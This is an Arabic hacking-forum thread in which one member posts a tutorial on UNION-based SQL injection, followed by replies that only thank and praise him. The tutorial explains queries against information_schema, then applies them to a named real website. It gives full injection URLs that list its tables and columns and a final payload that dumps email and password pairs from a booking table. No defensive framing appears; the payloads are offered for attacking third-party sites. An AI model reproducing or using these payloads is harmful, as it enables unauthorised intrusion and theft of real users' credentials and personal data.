حالة الموضوع:
مغلق
  1. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم نتكلم عن حقن المواقع بستعلام جديد
    واضهار المعلومات المطلوبه بحقنه واحده
    يعني راح نخاطب القاعده باستعلام واحد
    ان شاء الله
    هذا الدرس يعتبر من دروس الحقن المتقدم
    نبدأ
    اولا نقوم بتوضيح تفصيلي وتبسيطي للاستعلامات

    نأتي لنبين معنى الاستعلام

    التالي
    كود PHP:
     Concat(Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT(column_name))

    Concat = امر لربط اكثر من استعلام

    Table_schema = جدول نواة القاعده


    table_Name = اسم الجدول


    GROUP_CONCAT(column_name) = امر لربط واستخراج كل مافيه اي استخراج اسماء كل العواميد الموجوده


    الاستعلام الاخر


    كود PHP:
    +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1-- 
    FROM = من

    information_schema.columns = معلومات نواة القاعده للعواميد


    WHERE table_schema=database() = اينما تجد جدول نواة القاعده التي تساوي اسم القاعده


    GROUP BY table_name LIMIT 0,1 = اعرضهم لي عن طريق اسم اول جدول


    هنا

    فسرنا الاستعلامات تفسير بلغتنه لكي يفهم الحاقن ما هذه الاستعلامات وكيف يتم التخاطب بها مع القاعده

    يعني كأنا نقول للقاعده

    DATABASE . TABLE > ALL COLUMNS

    ياقاعده استخرجيلي الجدول الاول من اسم القاعده الفلانيه واجلبيلي كل الحقول الي داخل الجدول الفلاني



    الان نأتي الى التطبيق الحي على احدى المواقع


    عندنا موقع راح انطبق عليه الاستعلام

    لاحظ هذا الموقع

    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12-- 
    في عدة اعمده مصاب راح انجرب نحقن في العمود 11


    [​IMG]


    نجرب نضع استعلامنا

    يكون هذا في العمود المصاب

    كود PHP:
    Concat(Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT(column_name)) 
    ويكون الاستعلام التالي بعد الحقنه


    كود PHP:
    +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1-- 
    اي يصبح الاستعلام بهذا الشكل

    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,Concat%28Table_schema,0x2e,table_Name,0x3e,GROUP_CONCAT%28column_name%29%29,12+FROM%20information_schema.columns%20WHERE%20table_schema=database%28%29%20GROUP%20BY%20table_name%20LIMIT%200,1-- 
    [​IMG]


    لاحظ لقد تم استخراج كل العواميد الموجوده داخل الجدول باستعلام واحد و نستبعد الطريقة التقليديه في الحقن مما سيسهل علينا استخراج الاعمده التي بداخل الجداول بشكل سريع


    اسم القاعده = deepakba_star
    اسم الجدول = boothbooking

    اسماء الاعمده

    كود PHP:
    boothtotal,pc2_email,pc2_designation,pc2_name,pc1_email,pc1_designation,pc1_lname,pc1_name,website,email,cell,ownership,rep1_designation,otherorganisation,bookingamount,typeofbooking,servicetax,rep3_designation,rep3_name,rep2_email,rep2_designation,rep2_name,rep1_email,fax,tel,country,companyname,Id,StAR_ref_id,paymentid,password,rep1_name,address,city,state,postcode 
    الان ناتي الى الاستعلا الاخير في استخراج بيانات الاعمده


    راح نستخدم الاستعلام التالي ونضعه في العمود المصاب مع مراعات التغير الازم لاحظ



    كود PHP:
    (select+group_concat(column_name1,0x3a,column_name2,0x3c62723e)+from+table_Name)  
    column_name1 = العمود المراد استخراج بياناته اي مثلا يوزر الادمن
    table_Name = اسم الجدول الادمن لنفرض

    اي الحقنه في الاخير راح اتكون بهذا الشكل


    كود PHP:
    http://www.starasia.org/post.php?id=-14%20union%20select%201,2,3,4,5,6,7,8,9,10,%28select+group_concat%28email,0x3a,password,0x3c62723e%29+from+boothbooking%29,12--
    اعذروني ادري طولت عليكم
    السموحه يا شباب
    واي استفسار انا حاضر
    في امان الله
     
  2. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    مولع القسم بالمواضيع الرائعه ُ;)ًٌُ

    ماقدرت اقيمك i:q4^:

    يجب أن تضع للبعض سمعات قبل إعطائها إلى Hiker مرة أخرى.

    معوض يالذيب ً#ٌ5oًًًُ.
     
  3. مـ☻ـجـ☻ـآهـ☻ـد

    مـ☻ـجـ☻ـآهـ☻ـد <span style="background-color: #E0921B"><span styl DeveloPer Plus

    الأنتساب:
    ‏30 مارس 2012
    المشاركات:
    152
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    {ĜäŽã}
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    باركـ الله فيــك وزادك من علمه
    دائماً تتحفنا بحصرياتك و مواضيــعك الشيقةُ
     
  4. DeeF

    DeeF Developer

    الأنتساب:
    ‏15 نوفمبر 2012
    المشاركات:
    16
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    3
    الإقامة:
    I Q - T E A M
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    مبدع ومشكور على الطرح الرائع !!:{
     
  5. Hiker

    Hiker <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏2 يوليو 2014
    المشاركات:
    23
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    3
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    حياكم الله منورين اي استفسار موجود
    #ٌnًo.
     
  6. Abo MalaK

    Abo MalaK Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    يعطيك العافية يا مبدع
     
  7. Ahmed Hamody

    Ahmed Hamody ExpErt DeveloPer

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    74
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    مش هقول اني من مصر
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    تسلم ياغالي بارك الله فيك &:":
     
  8. d4rK-h4ck3r

    d4rK-h4ck3r Developer

    الأنتساب:
    ‏16 ديسمبر 2011
    المشاركات:
    38
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    تونس
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    عليكم السلام ورحمة الله وبركاته

    تسلم على الدرس الرائع

    درس سهل وواضح ومفهوم

    في إنتظار باقي الدروس

    دمت بحفظ الرحمن
     
  9. security alqasem

    security alqasem موقوف لمخالفة الشروط

    الأنتساب:
    ‏26 مايو 2014
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    المخالفات
    3
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    شكرا على الموضوع



    i:q^::{10}::{10}::{10}::{10}::{10}::{10}:i:q^:​
     
  10. ӎƦ.HmidE

    ӎƦ.HmidE DeveloPer Plus

    الأنتساب:
    ‏9 يوليو 2012
    المشاركات:
    106
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الوظيفة:
    .....
    الإقامة:
    JoRdaN
    رد: حقن المواقع باسهل الطرق +SQLI The easiest way+

    بارك الله فيك اخي واصل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة